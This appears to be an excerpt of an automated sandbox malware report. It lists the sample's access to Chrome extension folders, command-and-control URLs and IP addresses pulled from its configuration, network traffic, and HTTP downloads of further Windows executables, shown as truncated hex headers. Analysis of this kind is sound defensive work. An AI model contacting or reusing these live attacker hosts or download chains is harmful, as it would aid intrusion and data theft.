Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: firefox.exe

Memory has grown: Private usage: 1MB later: 74MB

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://85.28.47.31/5499d72b3a3e55be.php
Source: Malware configuration extractor	URLs: http://85.28.47.31silence
Source: Malware configuration extractor	IPs: 185.215.113.19
Source: Malware configuration extractor	URLs: 185.215.113.9:9137

Source: global traffic

TCP traffic: 192.168.2.5:61197 -> 185.215.113.9:9137

Source: global traffic	TCP traffic: 192.168.2.5:55731 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.5:60231 -> 1.1.1.1:53

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 26 Jul 2024 15:56:05 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 14:30:30 GMTETag: "10e436-5e7eeebed8d80"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 26 Jul 2024 15:56:12 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "a7550-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 26 Jul 2024 15:56:13 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "94750-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 26 Jul 2024 15:56:14 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "6dde8-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 26 Jul 2024 15:56:14 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "1f3950-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 26 Jul 2024 15:56:16 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "3ef50-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 26 Jul 2024 15:56:17 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "13bf0-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 